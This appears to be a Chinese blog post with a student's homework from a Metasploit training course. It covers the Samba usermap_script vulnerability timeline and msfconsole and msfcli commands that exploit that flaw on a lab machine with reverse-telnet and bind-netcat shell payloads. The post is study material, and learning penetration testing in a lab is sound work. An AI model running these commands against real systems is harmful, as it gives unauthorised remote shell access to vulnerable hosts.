metasploit魔鬼训练营第一章实践作业

1.搜索Samba服务usermap_script安全漏洞相关信息



根据下面的连接,搜索到如下内容:

The time line is as follows:

* May 7, 2007: Initial defect disclosure to the security@samba.org
  email alias.
* May 7, 2007: Initial developer response by Samba
  developer Gerald Carter.
* May 9, 2007: Patch released by Samba developer Jeremy
  Allison to iDefense for testing.
* May 10, Announcement to vendor-sec mailing list
* May 14, 2007: Public announcement of the security issue.

该漏洞的生命周期图,不会,略过

2.msfconsole 更新apt-get update

metasploit攻击模块路径:

dpkg -S metasploit
kali:/usr/share/metasploit-framework/modules/exploits
BT5:/opt/framework3/msf3/modules/exploits
linuxshell 统计针对windows2000 windowsxp。。。。目标环境的攻击模块数量(不知道)
 

3.运行metasploit完成对Linux靶机usermap_script攻击

kali: msfconsole

msf>show exploits

msf>use exploit/multi/samba/usermap_script 

msf> use exploit/multi/samba/usermap_script
msf> show options
msf> set RHOST 192.168.213.133
msf> exploit
尝试使用VNC图形化远程控制工具的攻击载荷

我的做法:

msf exploit(usermap_script) > show payloads

msf exploit(usermap_script) > set PAYLOADS cmd/unix/reverse_ssl_double_telnet 

msf exploit(usermap_script) > exploits

攻击失败了,但是流程应该是这样的????求解答

4.msfcli -h

msfconsole

msf>show payloads

msf>vim 1.attack.sh

 msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat   RHOST=$1 E 
msf>sh 1.attack.sh 192.168.213.133


  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值